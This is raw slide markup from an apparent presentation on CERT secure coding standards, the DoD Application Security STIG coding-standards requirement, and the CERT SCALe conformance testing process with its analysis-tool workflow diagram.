            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to approved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>secure coding standards of the Department during software development, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>upgrade, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and maintenance activities, including through the use of inspection and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>appraisals.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Security and Development Security Technical Implementation Guide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (STIG) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>is being specified in the DoD acquisition programs’ Request for Proposals (RFPs).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>provides security guidance for use throughout an application’s development lifecycle.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Section 2.1.5, “Coding Standards,” of the Application Security and Development STIG identifies the following requirement:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(APP2060.1: CAT II) “The Program Manager will ensure the development team follows a set of coding standards.”  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371673010"/>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Industry Demand</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8077200" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Conformance with CERT secure coding standards </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>can represent a significant investment by a software </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>developer, particularly when it is necessary to refactor or otherwise modernize existing software systems.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>However, it is not always possible for a software developer to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>benefit from this investment, because it is not always easy to market </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>code quality.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A goal of conformance testing is to provide an incentive for industry to invest in developing conforming systems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Perform conformance testing against CERT secure coding standards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Verify that a software system conforms with a CERT secure coding standard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use CERT SCALe seal when marketing products.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Maintain a certificate registry with the certificates of conforming systems.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32771" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="228600"/>
            <a:ext cx="2066925" cy="2019300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2158947097"/>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 Code Analysis Laboratory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1762015" y="1143000"/>
            <a:ext cx="5543769" cy="5105400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4064401027"/>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1576743" y="2091930"/>
            <a:ext cx="5509857" cy="1623013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t" anchorCtr="0"/>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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SCALe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Elbow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590444" y="3367154"/>
            <a:ext cx="1671706" cy="1208"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Elbow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="54" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3623764" y="3019366"/>
            <a:ext cx="2035122" cy="1208"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Elbow Connector 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2663127" y="2613613"/>
            <a:ext cx="2689267" cy="1208"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Flowchart: Document 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647591" y="4421391"/>
            <a:ext cx="1297330" cy="1679884"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocument">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent5"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Merged flagged non-conformities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Flowchart: Document 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1618123" y="5334000"/>
            <a:ext cx="1235609" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocument">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent5"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Probable violations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Flowchart: Document 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1618123" y="4295835"/>
            <a:ext cx="1235609" cy="809566"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocument">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent5"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Confirmed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>violations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rounded Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4116785" y="3251225"/>
            <a:ext cx="2035122" cy="289824"/>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dirty="0" smtClean="0"/>
              <a:t>Analysis Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4552883" y="2845471"/>
            <a:ext cx="2035122" cy="289824"/>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dirty="0" smtClean="0"/>
              <a:t>Analysis Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rounded Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4988980" y="2439719"/>
            <a:ext cx="2035122" cy="289824"/>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dirty="0" smtClean="0"/>
              <a:t>Analysis Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Flowchart: Magnetic Disk 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4116785" y="990600"/>
            <a:ext cx="1308292" cy="811507"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="3">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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Client Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Shape 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2715228" y="1396352"/>
            <a:ext cx="1401557" cy="1101329"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4249248" y="2323635"/>
            <a:ext cx="1043365" cy="151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5" name="Straight Arrow Connector 44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4858560" y="2091854"/>
            <a:ext cx="696181" cy="75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6" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3580612" y="2497606"/>
            <a:ext cx="1507687" cy="75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7" name="Straight Arrow Connector 46"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4944922" y="5224483"/>
            <a:ext cx="1380989" cy="36849"/>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8" name="Elbow Connector 47"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="1"/>
            <a:endCxn id="38" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2853733" y="4700618"/>
            <a:ext cx="793859" cy="560715"/>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49" name="Elbow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="1"/>
            <a:endCxn id="37" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2853733" y="5261332"/>
            <a:ext cx="793859" cy="52986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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5323991" y="4469731"/>
            <a:ext cx="1627427" cy="1680978"/>
            <a:chOff x="5075622" y="4191000"/>
            <a:chExt cx="1706178" cy="2209800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5486400" y="4191000"/>
              <a:ext cx="1295400" cy="15240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600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="4343400"/>
              <a:ext cx="1295400" cy="15240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600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Flowchart: Document 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5075622" y="4572000"/>
              <a:ext cx="1401378" cy="1828800"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDocument">
              <a:avLst/>
            </a:prstGeom>
            <a:ln/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:schemeClr val="accent5"/>
            </a:lnRef>
            <a:fillRef idx="3">
              <a:schemeClr val="accent5"/>
            </a:fillRef>
            <a:effectRef idx="3">
              <a:schemeClr val="accent5"/>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dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Flagged non-conformities</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Straight Arrow Connector 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806052" y="2729543"/>
            <a:ext cx="2" cy="174018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2" name="Straight Arrow Connector 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297272" y="3137144"/>
            <a:ext cx="1" cy="144851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3" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787735" y="3542294"/>
            <a:ext cx="1" cy="121786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54" name="Flowchart: Alternate Process 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1806691" y="2497683"/>
            <a:ext cx="1817072" cy="1043365"/>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dirty="0" smtClean="0"/>
              <a:t>Build Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Title 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conformance Testing Process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3861401"/>
            <a:ext cx="2438400" cy="405799"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CC00"/>
          </a:solid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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
